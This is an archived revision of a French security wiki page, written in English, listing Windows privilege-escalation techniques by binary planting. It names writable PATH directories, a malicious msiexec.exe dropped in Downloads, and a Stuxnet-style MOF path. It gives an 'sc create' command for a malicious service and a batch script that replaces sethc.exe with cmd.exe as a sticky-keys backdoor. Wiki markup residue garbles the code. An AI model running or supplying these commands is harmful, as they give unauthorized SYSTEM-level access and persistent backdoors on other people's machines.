===== Sommaire ===== {{indexmenu>:#1|js navbar ~~NOCACHE~~}}
Outils pour utilisateurs
Panneau latéral
start
**Ceci est une ancienne révision du document !** ----
A PCRE internal error occured. This might be caused by a faulty plugin
====== Bienvenue sur le Wiki SpX ====== Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges. ^Command ^Description / Importance | |''%SystemRoot%%%\%%System32%%\%%wbem%%\%%mof%%\%%'' |Taken from Stuxnet: [[http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf|http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf]] Look for Print spooler vulnerability. | |''echo $PATH'' |Check the $PATH environmental variable. Some directories may be writable. See: [[https://www.htbridge.com/advisory/HTB23108|https://www.htbridge.com/advisory/HTB23108]] | |''msiexec.exe'' |Idea taken from here: [[http://goo.gl/E3LTa|http://goo.gl/E3LTa]] - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. | |''sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys'' |Create malicious services. | |''Replacing file as: sethc.exe_PARA__TABLE_INS_@echo off _PARA__TABLE_INS_c: > nul%%\%%cd%%\%% > nul%%\%%cd %SYSTEMROOT%%%\%%System32%%\%% > nul _PARA__TABLE_INS_if exist %SYSTEMROOT%%%\%%System32%%\%%cmdsys%%\%% rd /q %SYSTEMROOT%%%\%%System32%%\%%cmdsys%%\%% > nul _PARA__TABLE_INS_cmd %SYSTEMROOT%%%\%%System32%%\%%cmdsys%%\%% > nul _PARA__TABLE_INS_copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul _PARA__TABLE_INS_copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul _PARA__TABLE_INS_copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul _PARA__TABLE_INS_copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul_PARA__TABLE_INS_exit'' |By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |
start.1433768487.txt.gz · Dernière modification: 2015/09/21 11:12 (modification externe)
Outils de la page
Sauf mention contraire, le contenu de ce wiki est placé sous les termes de la licence suivante : GNU Free Documentation License 1.3
